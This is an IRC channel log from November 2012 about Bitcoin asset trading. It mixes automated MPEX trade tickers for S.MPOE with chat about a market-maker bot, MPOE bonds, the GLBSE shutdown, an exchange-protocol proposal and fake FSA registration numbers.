[MPEX:S.MPOE] 1day: 0.00048086 / 0.00048779 / 0.00049519 (1615081 shares, 787.82 BTC), 30day: 0.00025015 / 0.00039134 / 0.0005 (85097298 shares, 33,302.67 BTC) Nov 02 07:13:12 I should head home to my sausage wallet Nov 02 07:14:25 and scene Nov 02 07:14:51 http://www.reddit.com/r/IAmA/comments/12hclg/iama_peter_acworth_ceo_and_founder_of_kinkcom_nsfw/c6v50by Nov 02 07:14:52 btw Nov 02 07:16:39 [MPEX] [S.MPOE] 23100 @ 0.00049016 = 11.3227 BTC [+] Nov 02 07:16:40 [MPEX] [S.MPOE] 17312 @ 0.00049286 = 8.5324 BTC [+] Nov 02 07:18:01 holy shit! eric idle is doin an iama? Nov 02 07:42:03 [MPEX] [S.MPOE] 8355 @ 0.00049286 = 4.1178 BTC [+] Nov 02 07:42:05 [MPEX] [S.MPOE] 2250 @ 0.00049399 = 1.1115 BTC [+] Nov 02 07:42:06 [MPEX] [S.MPOE] 3895 @ 0.00049417 = 1.9248 BTC [+] Nov 02 08:07:31 [MPEX] [S.MPOE] 39600 @ 0.00049 = 19.404 BTC [-] Nov 02 08:33:02 [MPEX] [S.MPOE] 29128 @ 0.00049417 = 14.3942 BTC [+] Nov 02 08:58:15 [MPEX] [S.MPOE] 35500 @ 0.00049 = 17.395 BTC [-] Nov 02 09:23:33 [MPEX] [S.MPOE] 7277 @ 0.00049417 = 3.5961 BTC [+] Nov 02 09:23:35 [MPEX] [S.MPOE] 5000 @ 0.000495 = 2.475 BTC [+] Nov 02 09:23:36 [MPEX] [S.MPOE] 5316 @ 0.00049519 = 2.6324 BTC [+] Nov 02 09:23:37 [MPEX] [S.MPOE] 19407 @ 0.00049546 = 9.6154 BTC [+] Nov 02 09:26:41 omg! mircea_popescu I've got it! Nov 02 09:26:47 ? Nov 02 09:26:54 some more code, and i'll have that market maker bot Nov 02 09:27:46 for options was it ? Nov 02 09:27:50 i just need the part where it watches for its orders to be taken by someone else and responds accordingly Nov 02 09:27:53 yup Nov 02 09:27:56 hey cool. Nov 02 09:28:03 but i figured out the hard part :) Nov 02 09:28:26 i.e. where to place standing orders at Nov 02 09:28:33 s/where/whatprice/ Nov 02 09:28:48 a cool. Nov 02 09:29:14 curious what comes of this :D Nov 02 09:31:08 me making btc at the cost of the greater fool, that's what :D Nov 02 09:31:38 smickles: market makers usually have some responsibilities like providing liquidity etc Nov 02 09:31:54 is that what you are going to do too? Nov 02 09:33:23 what if bid side (not you) has no orders? What if ask is gone? Are you buying/selling to/from your own books? etc... Nov 02 09:33:45 i presume he will maintain some orders on the book Nov 02 09:33:45 or ? Nov 02 09:34:27 who sets the rules for you? at what increment can you change prices etc. Nov 02 09:34:57 if you have no rules set like that, you are not really a market maker but just another trader executing trades for a client(s) Nov 02 09:37:18 heh, EskimoBob i should be providing liquidity on both sides nearly all the time, regardless of others standing orders Nov 02 09:39:19 cool, but what happens, if you do not? Nov 02 09:39:23 smickles is tis goins to be scm v 2.0 ? Nov 02 09:40:25 EskimoBob: well, if i don't, then it means that one or more of my basal assumptions was wrong Nov 02 09:41:26 mircea_popescu: naw, private thing. unless I really see that more capital will help, and i'm confident the risk is really outweighed by the benefit Nov 02 09:42:29 aha. funny thing, the girl was saying this exact thing to some investment club dood Nov 02 09:42:32 i'd prefer to keep all profit to myself :P Nov 02 09:43:30 anyway, i'll be off to bed for now; early engagement tomorrow Nov 02 09:45:36 pigeons and dub : how can you not like gage? https://bitcointalk.org/index.php?topic=115669.msg1312347#msg1312347 Nov 02 09:45:45 smickles : engage! Nov 02 09:45:46 :D Nov 02 09:48:39 [MPEX] [S.MPOE] 23893 @ 0.00049546 = 11.838 BTC [+] Nov 02 09:48:40 [MPEX] [S.MPOE] 5722 @ 0.00049557 = 2.8357 BTC [+] Nov 02 10:08:59 one saner post doesnt not a sane person make Nov 02 10:09:08 but he's earned some points Nov 02 10:13:54 smickles: good luck :) Nov 02 10:14:25 most important question... on what exchange are you going to run it? Nov 02 10:16:01 [MPEX] [S.MPOE] 24100 @ 0.00049266 = 11.8731 BTC [-] Nov 02 10:17:27 JoelKatz is riding his ego-trip wave big time :) Nov 02 10:18:20 https://bitcointalk.org/index.php?topic=121031.msg1312326#msg1312326 Nov 02 10:18:37 am I missing something? or is the alledged link here that they both used email Nov 02 10:20:50 He replaced that nose hair picture of himself with a "painting" of himself. Whats next? Will he paint that orange shirt black and add more uniform curls to his wig? Nov 02 10:41:48 [MPEX] [S.MPOE] 9259 @ 0.00049266 = 4.5615 BTC [-] Nov 02 10:41:50 [MPEX] [S.MPOE] 14641 @ 0.00049 = 7.1741 BTC [-] Nov 02 11:01:02 whats new? Nov 02 11:07:04 [MPEX] [S.MPOE] 15151 @ 0.00049316 = 7.4719 BTC [+] Nov 02 11:14:32 nuthing mon, nuthing Nov 02 11:16:00 people are writing scary stories to each other in form. Same shit, different day Nov 02 11:16:37 i see glbse is back up and nefario made his hostage of the account info public/offical Nov 02 11:23:49 ? Nov 02 11:23:53 URL Nov 02 11:32:32 [MPEX] [S.MPOE] 8259 @ 0.00049 = 4.0469 BTC [-] Nov 02 11:32:43 www.glbse.com Nov 02 11:32:53 UPDATE:Currently recovering bitcoin payments made in error, account closing has been halted until most of this has been recovered Nov 02 11:39:03 aka i've run for the border Nov 02 11:39:37 but all eyes on Goat who's the *real* criminal /s Nov 02 11:41:35 ? Nov 02 11:45:31 not really. Send back the coin that is not yours and this circus probably moves on Nov 02 11:46:06 fkn s.dice, I lost 0.075 BTC Nov 02 11:46:13 SCAM! Nov 02 11:46:14 lol Nov 02 11:47:02 smickles: there is no "_nearly_ all the time" :) Nov 02 11:47:54 only "all the time" unless you can produce digitally signed (by ID card) document from your doctor Nov 02 11:57:37 [MPEX] [S.MPOE] 25600 @ 0.00048923 = 12.5243 BTC [-] Nov 02 12:22:49 [MPEX] [S.MPOE] 7641 @ 0.00048923 = 3.7382 BTC [-] Nov 02 12:22:50 [MPEX] [S.MPOE] 19149 @ 0.00049316 = 9.4435 BTC [+] Nov 02 12:48:12 [MPEX] [S.MPOE] 5710 @ 0.0004937 = 2.819 BTC [+] Nov 02 13:13:19 [MPEX] [S.MPOE] 23800 @ 0.00048887 = 11.6351 BTC [-] Nov 02 13:13:21 [MPEX] [S.MPOE] 7647 @ 0.00048855 = 3.7359 BTC [-] Nov 02 13:39:13 [MPEX] [S.MPOE] 3490 @ 0.00048999 = 1.7101 BTC [+] Nov 02 13:39:14 [MPEX] [S.MPOE] 8610 @ 0.00049112 = 4.2285 BTC [+] Nov 02 14:05:00 [MPEX] [S.MPOE] 35753 @ 0.00048855 = 17.4671 BTC [-] Nov 02 14:05:01 [MPEX] [S.MPOE] 11347 @ 0.0004884 = 5.5419 BTC [-] Nov 02 14:08:26 am i like the only person on reddit with more link karma than comment karma ? Nov 02 14:10:12 iv never used reddit Nov 02 14:13:33 then you don't qualify! Nov 02 14:19:48 mornin Nov 02 14:20:54 heya Nov 02 14:27:15 how is it going Nov 02 14:28:04 owned bluematt a little on reddit Nov 02 14:28:08 otherwise bau Nov 02 14:30:18 [MPEX] [S.MPOE] 28453 @ 0.0004884 = 13.8964 BTC [-] Nov 02 14:30:19 [MPEX] [S.MPOE] 23047 @ 0.00048742 = 11.2336 BTC [-] Nov 02 14:31:50 urlpls Nov 02 14:33:37 http://www.reddit.com/r/Bitcoin/comments/12ht6y/bitcoin_and_the_poor/ Nov 02 14:34:42 "This guy needs to get laid. So much anger over such a small point." - LOL Nov 02 14:35:35 coding in my sleep = matt ? Nov 02 14:42:40 no ? Nov 02 14:42:57 i don't recall that guy's name on reddit but we did have a nice chat on my blog Nov 02 14:43:05 course it didn't come out too clearly what he's about. Nov 02 14:47:06 http://www.youtube.com/embed/Cd6C1vIyQ3w Nov 02 14:47:11 id like to try this. Nov 02 14:57:38 [MPEX] [S.MPOE] 13800 @ 0.00048909 = 6.7494 BTC [+] Nov 02 15:22:45 [MPEX] [S.MPOE] 31700 @ 0.00048909 = 15.5042 BTC [+] Nov 02 15:22:46 [MPEX] [S.MPOE] 10100 @ 0.00048978 = 4.9468 BTC [+] Nov 02 15:48:09 [MPEX] [S.MPOE] 13300 @ 0.00048754 = 6.4843 BTC [-] Nov 02 15:48:10 [MPEX] [S.MPOE] 28053 @ 0.00048742 = 13.6736 BTC [-] Nov 02 15:48:12 [MPEX] [S.MPOE] 1647 @ 0.0004872 = 0.8024 BTC [-] Nov 02 16:17:00 [MPEX] [S.MPOE] 14800 @ 0.00048978 = 7.2487 BTC [+] Nov 02 16:36:43 wow kakobrekla Nov 02 16:38:32 its prolly expencive as... hm... as saffron. Nov 02 16:39:36 expensive i ment. Nov 02 16:39:46 :> Nov 02 16:42:18 [MPEX] [S.MPOE] 3445 @ 0.00048937 = 1.6859 BTC [-] Nov 02 16:42:19 [MPEX] [S.MPOE] 7136 @ 0.0004872 = 3.4767 BTC [-] Nov 02 16:42:21 [MPEX] [S.MPOE] 27233 @ 0.0004867 = 13.2543 BTC [-] Nov 02 17:07:31 [MPEX] [S.MPOE] 22357 @ 0.0004867 = 10.8812 BTC [-] Nov 02 17:07:33 [MPEX] [S.MPOE] 4143 @ 0.00048585 = 2.0129 BTC [-] Nov 02 17:24:29 !ticker s.mpoe Nov 02 17:24:30 [MPEX:S.MPOE] 1day: 0.00048086 / 0.00048796 / 0.00049557 (1684503 shares, 821.97 BTC), 30day: 0.00025015 / 0.00039236 / 0.0005 (85146172 shares, 33,408.06 BTC) Nov 02 17:25:39 !ticker s.dice Nov 02 17:25:40 [MPEX:S.DICE] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.0001 / 0.00299494 / 0.0034 (2076191 shares, 6,218.07 BTC) Nov 02 17:26:37 !ticker s.bvps Nov 02 17:26:39 [MPEX:S.BVPS] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.0027501 / 0.00335836 / 0.00350001 (23698 shares, 79.59 BTC) Nov 02 17:26:40 saffron is cheap here Nov 02 17:32:35 [MPEX] [S.MPOE] 8671 @ 0.00048585 = 4.2128 BTC [-] Nov 02 17:32:37 [MPEX] [S.MPOE] 40429 @ 0.00048581 = 19.6408 BTC [-] Nov 02 17:32:38 [MPEX] [O.BTCUSD.P130T] 1 @ 0.26788816 BTC [-] Nov 02 17:33:28 https://bitcointalk.org/index.php?topic=119295.0 Nov 02 17:33:35 lol, this is bitcoin lending in a nutshell. Nov 02 17:36:30 never understood why anyone wants to lend BTC (except buy shit like drugs or pr0n) Nov 02 17:37:10 you mean lend or borrow ? Nov 02 17:37:26 borrow Nov 02 17:38:20 yeah. Nov 02 17:38:40 well, mpoe borrows to finance options trading. seems the only legitimate thing so far. Nov 02 17:38:53 how much does mpoe pay? Nov 02 17:39:19 Diablo-D3 it's open auction. as much as the filler asks for. Nov 02 17:39:27 last month it settled at 9% Nov 02 17:40:22 a month? Nov 02 17:40:30 a week? :) Nov 02 17:40:35 A DAY?! Nov 02 17:40:42 a month. Nov 02 17:41:04 well, an almost month. from last friday of one month till the last friday of next month. Nov 02 17:42:19 not bad Nov 02 17:42:38 double my money in a year :) Nov 02 17:42:55 you do undertake the risk tho. if the bot loses money you're on the hook. Nov 02 17:43:07 Chaang-Noi: have you learned nothing? :) Nov 02 17:43:12 lol Nov 02 17:43:21 brb, going to start a pass though! Nov 02 17:43:29 LOL Nov 02 17:43:42 :D Nov 02 17:44:06 where lol Nov 02 17:44:07 lol Nov 02 17:44:08 wait Nov 02 17:44:12 OT! Nov 02 17:44:24 you need at least 50 btc to qualify. Nov 02 17:44:39 im good at collecting funds for other people Nov 02 17:45:15 so go ahead Nov 02 17:45:24 as long as you explain the deal properly Nov 02 17:45:47 i was kidding... at this point im not doing anything. i explained pirate properly too and well that blew up in my face Nov 02 17:45:56 so much for letting people do what they want Nov 02 17:46:05 has it ? Nov 02 17:46:15 i wasn't following that closely. Nov 02 17:47:27 http://polimedia.us/dtng/c/src/135187123817.jpg i wonder how often he cuts himself Nov 02 17:48:25 SEC and all that... Nov 02 17:48:49 there is no way im doing anything with btc until all that BS is over... Nov 02 17:48:59 i bet it will take over a year Nov 02 17:49:46 prolly in a year the real battles start. Nov 02 17:50:05 yeah Nov 02 17:50:21 if it blows over it will take a year Nov 02 17:50:30 if they do whatever then yeah it will take a long damn time Nov 02 17:55:34 was wondering when a bitcoinica clone would start up using thier source code Nov 02 17:55:51 few days ago Nov 02 17:57:02 iv been traveling Nov 02 17:57:13 oh looks like 10 days ago Nov 02 17:57:16 yeah i missed it Nov 02 17:58:07 [MPEX] [S.MPOE] 5171 @ 0.00048581 = 2.5121 BTC [-] Nov 02 18:23:23 [MPEX] [S.MPOE] 3000 @ 0.00048553 = 1.4566 BTC [-] Nov 02 18:24:33 [MPEX] [S.MPOE] 1000 @ 0.00048553 = 0.4855 BTC [-] Nov 02 18:33:26 mircea_popescu: i want to invest 50btc in your bonds Nov 02 18:33:29 auctioneer Nov 02 18:33:50 so go ahead. Nov 02 18:34:08 make sure you first read up on them tho. Nov 02 18:34:58 will your bot lose me money!!! Nov 02 18:35:01 jkjk Nov 02 18:35:06 or make me money... Nov 02 18:35:16 im putting bets on a robot... Nov 02 18:35:24 asimov would be proud Nov 02 18:35:24 indeed. Nov 02 18:36:00 what are the general returns? Nov 02 18:36:07 does the bot usually make money? Nov 02 18:38:20 thestringpuller yeah, it lost money once so far. look at the monthly reports Nov 02 18:38:23 you got the link ? Nov 02 18:39:19 i see it in the faq Nov 02 18:39:22 hmm Nov 02 18:39:36 my investors want a place to put btc money into that is safe Nov 02 18:39:50 there are no treasury bonds (which are garbage anyways) Nov 02 18:40:14 and the last bond i bought defaulted because people are idiots Nov 02 18:40:58 well, mpoe bonds can make a loss, so they're not really safe in that sense. Nov 02 18:41:13 i used to think the mpcd series was, but that blew up. Nov 02 18:42:47 mircea_popescu: if the annual gains out pace the annual losses wouldnt it be a net gain? so the bot breaks even annually? Nov 02 18:43:12 the bot is ahead anually, iirc Nov 02 18:43:35 realyl, the only month it lost money was the pirate august thing. Nov 02 18:43:45 everyone lost money then Nov 02 18:43:57 only people buying puts made money Nov 02 18:45:13 mpoe stock is making me about 1% day... Nov 02 18:46:23 it has been going kinda crazy. Nov 02 18:48:26 bitcoin friday is gonna cause the price to skyrocket Nov 02 18:48:43 then reward drop in late november... Nov 02 18:49:20 lol i doubt it will have any impact. Nov 02 18:49:40 [MPEX] [S.MPOE] 19100 @ 0.00048539 = 9.2709 BTC [-] Nov 02 18:49:50 bonds are still bought by email? Nov 02 18:49:51 mpoe Nov 02 18:51:24 yeah Nov 02 19:00:11 the halloween futures changed the market conditions yesterday Nov 02 19:01:40 https://bitcointalk.org/index.php?topic=118354.msg1313150#msg1313150 Nov 02 19:03:20 how can one have such mess in database? Nov 02 19:03:33 I dont know Nov 02 19:03:39 a payout script like that would take three seconds to do Nov 02 19:05:04 am i the only one in this whole mess who has unit tests AND audit script to backward-verify the balances? Nov 02 19:10:28 i wrote unit tests... Nov 02 19:15:07 [MPEX] [S.MPOE] 17248 @ 0.00048539 = 8.372 BTC [-] Nov 02 19:15:08 [MPEX] [S.MPOE] 29652 @ 0.00048518 = 14.3866 BTC [-] Nov 02 19:16:34 haloween futures ?! Nov 02 19:16:39 http://i.imgur.com/04MFg.jpg Nov 02 19:40:16 [MPEX] [S.MPOE] 13300 @ 0.00048553 = 6.4575 BTC [+] Nov 02 20:05:51 [MPEX] [S.MPOE] 1897 @ 0.00048518 = 0.9204 BTC [-] Nov 02 20:33:28 [MPEX] [S.MPOE] 15934 @ 0.00048518 = 7.7309 BTC [-] Nov 02 20:33:29 [MPEX] [S.MPOE] 3166 @ 0.00048487 = 1.5351 BTC [-] Nov 02 20:58:32 [MPEX] [S.MPOE] 15729 @ 0.00048553 = 7.6369 BTC [+] Nov 02 20:58:33 [MPEX] [S.MPOE] 18200 @ 0.00048978 = 8.914 BTC [+] Nov 02 20:58:35 [MPEX] [S.MPOE] 9971 @ 0.00049112 = 4.897 BTC [+] Nov 02 21:02:15 interesting that practically everyone who wants to sell s.mpoe put the order below 0.0005 Nov 02 21:02:19 dunno why Nov 02 21:24:26 [MPEX] [S.MPOE] 4452 @ 0.00049038 = 2.1832 BTC [-] Nov 02 21:50:25 [MPEX] [S.MPOE] 18247 @ 0.00049112 = 8.9615 BTC [+] Nov 02 22:15:33 [MPEX] [S.MPOE] 9272 @ 0.00049112 = 4.5537 BTC [+] Nov 02 22:15:34 [MPEX] [S.MPOE] 28947 @ 0.00049218 = 14.2471 BTC [+] Nov 02 22:16:39 what is this milk friday or what Nov 02 22:30:20 kakobrekla milk friday ? Nov 02 22:38:07 oh another of those kako is scam days Nov 02 22:43:01 lol wut ? Nov 02 22:43:28 [MPEX] [S.MPOE] 30400 @ 0.00049127 = 14.9346 BTC [-] Nov 02 22:43:30 [MPEX] [S.MPOE] 2400 @ 0.00049218 = 1.1812 BTC [+] Nov 02 22:43:53 yeah silly people Nov 02 23:08:41 [MPEX] [S.MPOE] 18953 @ 0.00049218 = 9.3283 BTC [+] Nov 02 23:09:40 jurov : did you know the FIX protocol also uses string representations of integers btw ? Nov 02 23:10:08 no Nov 02 23:15:27 mircea_popescu, i just did random research and it appears not true Nov 02 23:15:30 http://www.fixprotocol.org/documents/633/Waters_NY_FIX_4.3_Changes_20010912.pdf Nov 02 23:15:45 eh wtf they changed it ?! Nov 02 23:16:12 dunno, it's really whatever i stumbled on Nov 02 23:16:37 The FIX Protocol has two syntaxes: Nov 02 23:16:37 • “Tag=Value” Nov 02 23:16:37 – 75=20010618 Nov 02 23:16:42 that 75 ? that's a string. Nov 02 23:18:24 oh i misunderstood you. i thought you're talking that "FIX also encloses numbers in quotes" Nov 02 23:18:51 but then, what's your point? Nov 02 23:20:07 kakobrekla https://bitcointalk.org/index.php?topic=102176.msg1313402#msg1313402 ? Nov 02 23:20:21 that integers are strings :D Nov 02 23:20:43 anyway, fix uses some weirdo xml Nov 02 23:20:46 no json afaik Nov 02 23:20:52 (maybe it changed, i haven't kept up) Nov 02 23:34:07 [MPEX] [S.MPOE] 4900 @ 0.0004926 = 2.4137 BTC [+] Nov 02 23:48:59 smickles: gimme a buzz when you get in Nov 02 23:49:52 mircea_popescu: did you not have any halloween futures? Nov 02 23:50:14 not afaik Nov 02 23:51:29 some guy on the forums said he'd promise to buy btc's at 11 back in july Nov 02 23:59:45 [MPEX] [S.MPOE] 20247 @ 0.0004926 = 9.9737 BTC [+] Nov 03 00:24:59 [MPEX] [S.MPOE] 3500 @ 0.00049081 = 1.7178 BTC [-] Nov 03 00:34:12 tried to research venetfx's FSA registration #194835 Nov 03 00:34:48 it belongs to some completely different entity with defunct website, dates of registration 2001 and 2003 Nov 03 00:36:14 17 Feb 2004 Final Dissolution Notice.. so venetfx's FSA number is completely fake, too Nov 03 00:36:31 seems that way Nov 03 00:50:30 [MPEX] [S.MPOE] 1853 @ 0.00049249 = 0.9126 BTC [+] Nov 03 00:50:32 [MPEX] [S.MPOE] 4000 @ 0.000493 = 1.972 BTC [+] Nov 03 00:50:33 [MPEX] [S.MPOE] 21600 @ 0.00049382 = 10.6665 BTC [+] Nov 03 00:50:34 [MPEX] [S.MPOE] 3470 @ 0.00049388 = 1.7138 BTC [+] **** BEGIN LOGGING AT Sat Nov 3 09:36:51 2012 Nov 03 09:59:35 [MPEX] [S.MPOE] 5300 @ 0.00049034 = 2.5988 BTC [+] Nov 03 10:24:44 [MPEX] [S.MPOE] 11900 @ 0.00049004 = 5.8315 BTC [-] Nov 03 10:24:46 [MPEX] [S.MPOE] 3400 @ 0.00048881 = 1.662 BTC [-] Nov 03 10:50:08 [MPEX] [S.MPOE] 10900 @ 0.00049021 = 5.3433 BTC [+] Nov 03 11:15:34 [MPEX] [S.MPOE] 4100 @ 0.00049034 = 2.0104 BTC [+] Nov 03 11:15:36 [MPEX] [S.MPOE] 15699 @ 0.00049277 = 7.736 BTC [+] Nov 03 11:40:39 [MPEX] [S.MPOE] 15496 @ 0.00049021 = 7.5963 BTC [-] Nov 03 11:40:40 [MPEX] [S.MPOE] 7148 @ 0.00048881 = 3.494 BTC [-] Nov 03 11:40:42 [MPEX] [S.MPOE] 806 @ 0.00048869 = 0.3939 BTC [-] Nov 03 11:49:37 LOL @ "Facts don't match my ideology so FACTS MUST BE WRONG!!!" <-- /. comment Nov 03 12:06:11 [MPEX] [S.MPOE] 19427 @ 0.00048869 = 9.4938 BTC [-] Nov 03 12:31:27 [MPEX] [S.MPOE] 35749 @ 0.0004886 = 17.467 BTC [-] Nov 03 12:31:28 [MPEX] [S.MPOE] 400 @ 0.00048855 = 0.1954 BTC [-] Nov 03 12:31:29 [MPEX] [S.MPOE] 3851 @ 0.0004879 = 1.8789 BTC [-] Nov 03 12:34:02 http://trilema.com/2012/towards-a-unified-exchange-protocol/ << RFC. Nov 03 12:34:25 ;;seen DeadTerra Nov 03 12:34:26 DeadTerra was last seen in #bitcoin-assets 1 week, 3 days, 20 hours, 9 minutes, and 56 seconds ago: but I agree there are to much drama and BS Nov 03 12:34:31 thought so Nov 03 12:34:40 heh Nov 03 12:35:19 should have kicked some guys in the nuts when I had the chance in London Nov 03 12:43:11 thats where netardio was building the future of bitcoin right? Nov 03 12:45:06 yes. Nov 03 12:45:12 and telling people about how mpex is a scam. Nov 03 12:45:27 interscamdo... Nov 03 12:45:46 or is it interscamgo ? Nov 03 12:46:21 with nefario it is really hard to dell the differance between criminal and just being so fucking retarded... Nov 03 12:46:38 it is hard for me to think he acidently so much Nov 03 12:46:47 indeed. Nov 03 12:47:28 same with intersango and their bitcoinica stuff Nov 03 12:47:39 luckily unlike criminally insane, criminally retarded is not a valid defense afaik Nov 03 12:48:04 yeah we should just go with criminally retarded until we get more evidance Nov 03 12:49:58 Indeed Nov 03 12:50:08 dub sure it is Nov 03 12:56:45 [MPEX] [S.MPOE] 11549 @ 0.0004879 = 5.6348 BTC [-] Nov 03 12:56:46 [MPEX] [S.MPOE] 8651 @ 0.00048789 = 4.2207 BTC [-] Nov 03 13:05:27 orly? Nov 03 13:05:58 you have negligence and nuisance as offenses Nov 03 13:06:45 which can be applied to 'act of stupidity causes loss' Nov 03 13:24:29 [MPEX] [S.MPOE] 9349 @ 0.00048789 = 4.5613 BTC [-] Nov 03 13:24:31 [MPEX] [S.MPOE] 14300 @ 0.00048788 = 6.9767 BTC [-] Nov 03 13:24:32 [MPEX] [S.MPOE] 3500 @ 0.00048787 = 1.7075 BTC [-] Nov 03 13:24:33 [MPEX] [S.MPOE] 29451 @ 0.00048781 = 14.3665 BTC [-] Nov 03 13:38:19 ya but mental retardation is like a positive defense Nov 03 13:50:00 [MPEX] [S.MPOE] 573 @ 0.00048868 = 0.28 BTC [+] Nov 03 13:50:01 [MPEX] [S.MPOE] 17127 @ 0.0004893 = 8.3802 BTC [+] Nov 03 14:15:10 [MPEX] [S.MPOE] 21000 @ 0.0004893 = 10.2753 BTC [+] Nov 03 14:42:26 [MPEX] [S.MPOE] 9823 @ 0.0004893 = 4.8064 BTC [+] Nov 03 14:42:28 [MPEX] [S.MPOE] 13411 @ 0.00049277 = 6.6085 BTC [+] Nov 03 15:00:08 mircea_popescu: youawake? Nov 03 15:00:26 yea Nov 03 15:00:40 who was saying mpex was a scam? Nov 03 15:03:19 oh nefario Nov 03 15:03:29 sorry, my logs are screwed up Nov 03 15:07:34 :p Nov 03 15:08:05 [MPEX] [S.MPOE] 2650 @ 0.00049277 = 1.3058 BTC [+] Nov 03 15:08:07 [MPEX] [S.MPOE] 4572 @ 0.00049316 = 2.2547 BTC [+] Nov 03 15:12:59 mircea_popescu: your existence is making me money Nov 03 15:13:12 haha cool Nov 03 15:14:15 not a lot of money Nov 03 15:14:23 but it's still moolah Nov 03 15:18:35 mircea_popescu: why are you standardising now that you start using json with one returning json and all other non-json? Nov 03 15:19:03 FabianB_ come again ? Nov 03 15:20:13 11:34 < mircea_popescu> http://trilema.com/2012/towards-a-unified-exchange-protocol/ << RFC. Nov 03 15:20:30 well yes, since it was being discussed on the forum i wrote up a proposal Nov 03 15:20:32 STATJSON returns data as json Nov 03 15:20:44 otherwise this exists as internal stuff for about a year now Nov 03 15:21:05 yeah, am fine with this being mpex protocol Nov 03 15:21:24 just doesn't seem polished enough to qualify as standard yet Nov 03 15:21:30 well no, it's a proposal Nov 03 15:21:38 people should comment Nov 03 15:23:38 data as json in both directions would seem more consistent Nov 03 15:24:35 even if with so few commands and payload it's easy to parse |foo|bar|baz Nov 03 15:24:45 many of those commands are being issued by hand Nov 03 15:24:57 json would seem like undue burden Nov 03 15:26:25 xml is an undue burden Nov 03 15:26:33 that the corporate world put on us Nov 03 15:34:12 [MPEX] [S.MPOE] 1800 @ 0.00049389 = 0.889 BTC [+] Nov 03 15:34:13 [MPEX] [S.MPOE] 5852 @ 0.00049397 = 2.8907 BTC [+] Nov 03 15:34:15 [MPEX] [S.MPOE] 2248 @ 0.0004942 = 1.111 BTC [+] Nov 03 15:41:47 well, yeah, by hand it's nicer than json Nov 03 15:48:46 FabianB_ moreover, the spec is not restrictive. some exchange might decide to implement STATXML too Nov 03 15:49:04 that's not forbidden. but it would be weird to require exchanges to accept both json and xml imput Nov 03 15:53:36 xml should be forbidden in general Nov 03 15:54:16 yeah, who wants xml ;) Nov 03 15:54:35 corporations lol Nov 03 15:56:08 wondering if there are papers on designing protocols for both computers/humans Nov 03 15:56:28 anyway, in general it's a minimum standards approach Nov 03 15:56:38 earlier protocols like smtp were(are) very easy to use for humans too Nov 03 15:56:39 "have to have at least this much" Nov 03 15:57:05 generally a nice aproach mircea_popescu Nov 03 15:57:35 yeah. anyway the only one with a prayer given that there's no standards body and compliance is voluntary Nov 03 15:57:38 (maybe community-driven) Nov 03 15:58:14 standards bodies are usually too slow Nov 03 15:59:32 [MPEX] [S.MPOE] 3952 @ 0.0004942 = 1.9531 BTC [+] Nov 03 15:59:34 [MPEX] [S.MPOE] 1000 @ 0.0004945 = 0.4945 BTC [+] Nov 03 15:59:35 [MPEX] [S.MPOE] 19510 @ 0.00049556 = 9.6684 BTC [+] Nov 03 16:01:51 true Nov 03 16:02:00 but the big problem is usually the lobby stuff Nov 03 16:02:52 there rg you got fans https://bitcointalk.org/index.php?topic=121027.msg1314499#msg1314499 Nov 03 16:25:22 [MPEX] [S.MPOE] 22850 @ 0.0004935 = 11.2765 BTC [-] Nov 03 16:50:55 [MPEX] [S.MPOE] 28812 @ 0.0004935 = 14.2187 BTC [-] Nov 03 17:16:00 [MPEX] [S.MPOE] 14800 @ 0.0004897 = 7.2476 BTC [-] Nov 03 17:24:43 zomg teh interface http://www.youtube.com/watch?v=Bq2devvvyrg&feature=youtu.be Nov 03 17:41:39 [MPEX] [S.MPOE] 18250 @ 0.0004897 = 8.937 BTC [-] Nov 03 18:06:47 [MPEX] [S.MPOE] 13550 @ 0.0004897 = 6.6354 BTC [-] Nov 03 18:06:48 [MPEX] [S.MPOE] 400 @ 0.00048808 = 0.1952 BTC [-] Nov 03 18:31:58 [MPEX] [S.MPOE] 26381 @ 0.00048808 = 12.876 BTC [-] Nov 03 18:31:58 [MPEX] [S.MPOE] 2449 @ 0.00048781 = 1.1946 BTC [-] Nov 03 18:32:01 [MPEX] [S.MPOE] 2590 @ 0.00048776 = 1.2633 BTC [-] Nov 03 18:57:23 [MPEX] [S.MPOE] 1685 @ 0.00049055 = 0.8266 BTC [+] Nov 03 19:22:46 [MPEX] [S.MPOE] 36500 @ 0.00049232 = 17.9697 BTC [+] Nov 03 19:22:48 [MPEX] [S.MPOE] 1200 @ 0.00049556 = 0.5947 BTC [+] Nov 03 19:44:26 mircea_popescu: Nov 03 19:44:32 the man who created mpex Nov 03 19:48:00 [MPEX] [S.MPOE] 24764 @ 0.00049079 = 12.1539 BTC [-] Nov 03 19:48:01 [MPEX] [S.MPOE] 13936 @ 0.00049063 = 6.8374 BTC [-] Nov 03 20:13:07 [MPEX] [S.MPOE] 14364 @ 0.00049063 = 7.0474 BTC [-] Nov 03 20:13:08 [MPEX] [S.MPOE] 26110 @ 0.00048776 = 12.7354 BTC [-] Nov 03 20:13:09 [MPEX] [S.MPOE] 8988 @ 0.00048769 = 4.3834 BTC [-] Nov 03 20:13:10 [MPEX] [S.MPOE] 7952 @ 0.00048759 = 3.8773 BTC [-] Nov 03 20:38:27 [MPEX] [S.MPOE] 8984 @ 0.00048759 = 4.3805 BTC [-] Nov 03 20:49:14 so, did kakobrekla at least to try to shed some light on the accusations somehow? Nov 03 20:49:25 or just having lulz with his boss? Nov 03 20:53:33 [MPEX] [O.BTCUSD.C110T] 817 @ 0.20698633 = 169.1078 BTC [-] Nov 03 20:53:50 not afaik. Nov 03 21:06:53 calls are getting sold? Nov 03 21:11:15 what do you mean? Nov 03 21:20:22 [MPEX] [S.MPOE] 44700 @ 0.00049089 = 21.9428 BTC [+] Nov 03 21:20:24 [MPEX] [S.MPOE] 950 @ 0.00048759 = 0.4632 BTC [-] Nov 03 21:45:45 [MPEX] [S.MPOE] 4648 @ 0.00048759 = 2.2663 BTC [-] Nov 03 21:54:59 http://codinginmysleep.com/bitcoinstore-com-launch-cheaper-in-bitcoin/ Nov 03 21:55:00 ohrly Nov 03 22:11:15 [MPEX] [S.MPOE] 32467 @ 0.00049058 = 15.9277 BTC [+] Nov 03 22:24:16 < jurov> so, did kakobrekla at least to try to shed some light on the accusations somehow? <<< whatnow? Nov 03 22:36:43 i'm just interested Nov 03 22:37:27 [MPEX] [S.MPOE] 6572 @ 0.00049058 = 3.2241 BTC [+] Nov 03 22:50:39 jurov: what accusations? Nov 03 22:51:51 smickles_: https://bitcointalk.org/index.php?topic=114821.msg1313361#msg1313361 Nov 03 22:53:24 and I put myself the FSA Registration# from bit4x site into FSA form and it was assigned to some other company that 